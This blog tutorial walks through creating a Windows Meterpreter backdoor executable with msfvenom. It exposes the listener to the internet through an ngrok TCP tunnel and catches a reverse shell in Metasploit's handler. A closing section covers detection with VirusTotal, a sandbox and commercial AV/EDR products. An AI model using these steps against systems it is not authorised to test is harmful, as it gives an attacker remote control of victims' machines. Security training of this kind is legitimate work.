Forming Backdoor Payload and Obtaining a Reverse Shell Using Ngrok and Metasploit Framework and How to Protect Yourself from it

This article was written to provide information about offensive security. However, it is strictly forbidden to misuse this information or engage in illegal activities. Please use this information only for ethical and legal activities. The author of this article cannot be held responsible for any misuse.

The purpose of this article is to forming a backdoor payload using the metasploit framework and to enable us to receive a reverse shell by forwarding the requests from the people running the payload over the internet to our local host using the ngrok tool. Then we will talk about how we can defend ourselves against such attacks.

Firstly, i need to describe some terms briefly before starting this article.

Backdoor: Backdoor is the way of accessing to the system without using normal accessing ways. Backdoors are generally using for delivering malicious softwares to the systems.

Reverse Shell: Obtaining shell on the another system via remote system.

We will use the Ngrok tool for broadcasting, so let’s download the free ngrok tool..

1- Download ngrok from “” site. We can extract it with “tar xvf <filename>” from the zip.

2- After the download, we need to go down a little bit on the website and add the relevant token “./ngrok config add-authtoken <token>

And paste to the console.

You’ll reveice the massage that contains saving the token to the related path.

3- Let’s share our Local Host as a server with command “service apache2 start“.

5- Then we can make it open to the outside with Ngrok. This broadcast can be done over http as well as over tcp. So I start the broadcast by saying “./ngrok tcp 8080“.

Now, it is broadcasting to the internet over the relevant domain and that domain forwards it to our localhost.

6- From here, we can say that we are done with ngrok. Now we’re gonna use MetaSploit Framework to forming a backdoor and obtain reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > backdoor.exe

7- Then we need to make a few small settings on msfconsole.

  • use exploit/mutli/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost
  • set lport 8080
  • run

8- At this stage, we are now in a listening position. After our backdoor.exe file is run on any system, the request will be sent to the domain we are listening to via tcp 14848, and from there it will be directed to the local host. Let’s run our backdoor.exe on the relevant system.

9- After running the payload, we start to see the logs of the session on msfconsole.

10- Now we can obtain a reverse shell with the “shell” command and run the command we want.

In fact, the point to be noted here is not to rely solely on Windows Defender because windows defender was turned on on the end point where we tested it.

If a file raises your doubts, you can do a few things about it. The first of these;

  • Check it in Virus Total.

You can search hash, file and url in Virut Total. Since our payload is not in the VT database, it did not bring us any results.

  • Sandbox (eg hybrid analysis)

Sandboxes are closed environments where suspicious files are exploded. Thus, you can understand whether the file is malicious or not without any real damage. We’re gonna use Hybrid Analysis which is free and you can use.

Hybrid analysis’s AV results show that Crowdstrike and MetaDefender found it malicious.

Then, when we examine the Sandbox results,

It gave payload’s Threat score as 100 out of 100. When I look at the details, it gives 2 malicious indicators and 6 suspicious indicators. When we look in more detail, we can see why he gave them.

On the other hand, you can use signiture based AV or EDR for individual uses, even if it’s free, in order not to be exposed to such attacks. These can be AVs like Norton, Eset, Kaspersky. Even these have signatures to block pests like in this article. On the other hand, let’s take a look at how some enterprise-level security products react to this payload.

  • Crowdstrike Falcon(Next-Gen AV and EDR)

As seen in the pictures, Crowdstrike quarantined the related file shortly after it was downloaded via the browser, thanks to machine learning models, due to the malicious behavior of the related file, and the backdoor was prevented from forming, so we could not obtain a reverse shell.

  • FireEye HX(EDR)

FireEye HX also detected the relevant backdoor payload based on signature and sent us the alarm of this.

As a result, using at least one security product, albeit free, will provide you with adequate protection against known attacks in your daily routine. However, security products with much more complex disciplines can come into play to access adequate protection at the enterprise level.






Leave a Reply

Your email address will not be published. Required fields are marked *